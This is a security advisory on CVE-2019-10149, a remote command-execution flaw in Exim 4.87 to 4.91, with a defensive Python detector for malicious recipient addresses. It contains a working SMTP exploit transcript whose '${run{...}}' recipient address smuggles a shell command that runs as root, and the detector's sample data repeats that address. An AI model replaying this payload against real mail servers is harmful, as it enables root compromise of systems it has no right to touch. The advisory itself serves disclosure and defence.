Allele Security Alert
ASA-2019-00320
Identifier(s)
ASA-2019-00320, CVE-2019-10149
Title
Remote command execution (RCE) via recipient address
Vendor(s)
The Exim Maintainers
Product(s)
Exim
Affected version(s)
Exim versions from 4.87 to 4.91
Fixed version(s)
Exim version 4.92
Proof of concept
Unknown
Description
A flaw was found in the way Exim validated recipient addresses. A remote attacker could use this flaw to execute arbitrary commands on the Exim server with the permissions of the user running the application.
Technical details
The vulnerable code is located in deliver_message():
#ifndef DISABLE_EVENT
  if (process_recipients != RECIP_ACCEPT)
    {
    uschar * save_local = deliver_localpart;
    const uschar * save_domain = deliver_domain;

    deliver_localpart = expand_string(
      string_sprintf("${local_part:%s}", new->address));
    deliver_domain = expand_string(
      string_sprintf("${domain:%s}", new->address));

    (void) event_raise(event_action,
      US"msg:fail:internal", new->message);

    deliver_localpart = save_local;
    deliver_domain = save_domain;
    }
#endif
Because expand_string() recognizes the “${run{<command> <args>}}” expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to “${run{…}}@localhost” (where “localhost” is one of Exim’s local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default):
john@debian:~$ cat /tmp/id
cat: /tmp/id: No such file or directory
john@debian:~$ nc 127.0.0.1 25
220 debian ESMTP Exim 4.89 Thu, 23 May 2019 09:10:41 -0400
HELO localhost
250 debian Hello localhost [127.0.0.1]
MAIL FROM:<>
250 OK
RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
.
250 OK id=1hTnYa-0000zp-8b
QUIT
221 debian closing connection
john@debian:~$ cat /tmp/id
cat: /tmp/id: Permission denied
root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
In this example:
– we send more than received_headers_max (30, by default) “Received:” headers to the mail server, to set process_recipients to RECIP_FAIL_LOOP and hence execute the vulnerable code;
– we escape invalid characters in the recipient’s address with backslashes, which are conveniently interpreted by expand_string() (in expand_string_internal() and transport_set_up_command()).
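Added here as a defensive example (not part of the Qualys analysis or of Exim's own code): a Python helper that undoes the backslash escapes described above, approximately as expand_string() does, and flags RCPT TO local parts that still carry a "${...}" expansion item, so a mail gateway or log review can spot recipients of this shape. The escape handling is an assumption modelled on Exim's string_interpret_escape(); the sample addresses are constructed, except for the one taken from the transcript above.

```python
import re

# Backslash escapes that Exim's expand_string() interprets in a local part.
# Assumption: approximates Exim's string_interpret_escape() (\xHH hex,
# \NNN octal, \t \n \r, and \<char> for a literal char); not Exim's own code.
_ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|.)', re.DOTALL)

def decode_exim_escapes(s: str) -> str:
    """Undo backslash escapes the way Exim's expansion code does."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == 'x' and len(tok) > 1:   # \x2F -> '/'
            return chr(int(tok[1:], 16))
        if tok[0] in '01234567':              # \101 -> 'A'
            return chr(int(tok, 8))
        return {'t': '\t', 'n': '\n', 'r': '\r'}.get(tok, tok)
    return _ESCAPE_RE.sub(repl, s)

def inspect_recipient(address: str) -> dict:
    """Verdict for one RCPT TO address (without angle brackets). A local part
    containing '${' is an Exim expansion item that the vulnerable
    deliver_message() path hands to expand_string(), so it is flagged."""
    local, sep, domain = address.rpartition('@')
    if not sep:                               # no '@': all of it is the local part
        local, domain = address, ''
    decoded = decode_exim_escapes(local)      # readable form for the analyst
    return {
        'address': address,
        'domain': domain,
        'decoded_local_part': decoded,
        'suspicious': '${' in decoded,
        'uses_run_item': '${run' in decoded,
    }

def flag_recipients(addresses: list) -> list:
    """Return verdicts for every address carrying an expansion item."""
    return [v for v in map(inspect_recipient, addresses) if v['suspicious']]

# Constructed sample: two ordinary recipients plus the address from the transcript above.
SAMPLE_RCPTS = [
    'alice@example.org',
    'bob+lists@example.org',
    r'${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost',
]

if __name__ == '__main__':
    for v in flag_recipients(SAMPLE_RCPTS):
        print(v['address'], '->', repr(v['decoded_local_part']))
```

The check is a heuristic: RFC 5321 permits "$", "{" and "}" in local parts, so a hit should be reviewed rather than rejected blindly, and the durable fix remains upgrading to Exim 4.92.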
Credits
Qualys Research Labs
Reference(s)
CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit
https://seclists.org/oss-sec/2019/q2/140
CVE-2019-10149 Exim 4.87 to 4.91
https://www.exim.org/static/doc/security/CVE-2019-10149.txt
Fix CVE-2019-10149
https://git.exim.org/exim.git/commit/d740d2111f189760593a303124ff6b9b1f83453d
Exim CVE-2019-10149, how to protect yourself
https://blog.cpanel.com/exim-cve-2019-10149-protect-yourself/
Qualys Security Advisory – The Return of the WIZard: RCE in Exim (CVE-2019-10149)
https://seclists.org/oss-sec/2019/q2/153
CVE-2019-10149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149
CVE-2019-10149
https://nvd.nist.gov/vuln/detail/CVE-2019-10149
If there is any error in this alert, or if you would like a comprehensive analysis, let us know.
Last modified: June 8, 2019